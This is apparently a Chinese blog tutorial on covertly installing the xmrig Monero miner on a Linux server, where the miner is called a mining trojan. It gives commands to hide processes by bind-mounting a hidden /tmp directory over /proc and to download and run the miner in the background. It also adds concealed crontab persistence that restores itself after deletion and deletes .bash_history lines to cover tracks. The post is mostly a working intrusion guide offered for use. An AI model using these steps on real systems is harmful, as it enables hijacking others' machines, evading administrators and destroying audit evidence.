进程隐藏
目录挂载
mkdir -p /tmp/.k/null
mount --bind /tmp/.k/null /proc
命令 mkdir /tmp/.k/null 在Linux或类Unix操作系统中用于创建一个新的目录结构。这个命令的组成部分和它们各自的含义如下:
mkdir:这是一个命令行工具,用于创建新的目录(文件夹)。如果指定的目录已存在,则通常会显示一个错误消息,除非使用了特定的选项(如-p)来允许创建多级目录结构而不在每个级别上出错。/tmp/.k/null:这是要创建的目录的路径。这个路径由几个部分组成:/tmp:这是一个系统级别的临时文件存储目录,通常用于存储临时文件,这些文件在系统重启后可能会被删除或清理。任何用户都可以在这个目录下创建、读取、写入和删除文件,但通常不建议存储重要数据,因为这里的数据可能会随时丢失。.k:这是/tmp目录下将要被创建的一个新目录的名称。.(点)在目录名开始时通常表示该目录是隐藏的,即在使用图形界面或某些命令行工具列出目录内容时,默认情况下不会显示。null:这是.k目录下将要被创建的新目录的名称。
综上所述,mkdir /tmp/.k/null命令的作用是在/tmp目录下创建一个名为.k的隐藏目录(如果它还不存在的话),然后在.k目录下再创建一个名为null的子目录。这可以用于存储一些临时数据或文件,这些数据或文件对系统用户来说是隐藏的,并且位于系统的临时文件存储区域中。
需要注意的是,如果/tmp/.k目录已经存在,但/tmp/.k/null目录不存在,那么mkdir /tmp/.k/null命令会成功创建null目录。但是,如果/tmp/.k目录本身不存在,那么命令会失败,除非使用mkdir -p /tmp/.k/null,其中-p选项会指示mkdir命令创建所有必要的父目录。
在Linux系统中,mount --bind 命令用于将一个已存在的目录挂载到另一个位置,使得这两个位置指向同一个文件系统上的相同目录。然而,你给出的命令 mount --bind /tmp/.k/null /proc 尝试将 /tmp/.k/null 目录挂载到 /proc 目录上,这在大多数情况下是不合适的,因为 /proc 目录在Linux中有特殊的用途。
/proc 是一个虚拟文件系统,它包含了系统运行时的信息,如进程信息、内核参数等。这个目录不是用来存储用户数据的,而是由内核动态生成的。尝试将 /tmp/.k/null 挂载到 /proc 可能会导致系统不稳定或无法访问 /proc 目录中的关键信息。
上挖矿马
-
申请门罗币钱包: 最新教程: https://www.xmr-zh.com/tech/wallet-tech.html
-
寻找一个矿池加入挖矿: 门罗币矿池很多,你可以随意找一个,例如: https://c3pool.com/cn/ 或者 https://www.f2pool.co/
在挖矿软件的配置文件中填写你的门罗币钱包地址,和矿池地址: 例如:以 xmrig 挖矿软件 和 supportxmr 矿池为例:
切换到你创建的隐藏目录下下载
wget https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz
解压
tar -zxvf xmrig.tar.gz
解压后我们得到俩个文件,一个是 xmrig 主程序,一个是 config. Json 配置文件。
配置
输入:vim config.json 打开 config. Json 文件,将 YOUR_WALLET_ADDRESS 修改成你的钱包地址
运行
./xmrig
#后台启动
nohup ./xmrig &
科普
netstat -anpt如果未隐藏之前是这样的
隐藏之后
计划任务
添加计划任务使其可以开机自启,删除后恢复,准备以下两个脚本文件
代码脚本
上传脚本运行
#上传脚本运行 mkdir /tmp/.s cd /tmp/.s chmod 777 1.sh chmod 777 2.sh ./2.sh
效果:crontab -l ,必须 cat -A 或者 vim、vi 才能看到
nl .bash_history
sed -i '10,$d' .bash_history查看挖矿进展:去对应的矿池查看收益以 supperxmr 矿池为例
请登录后查看评论内容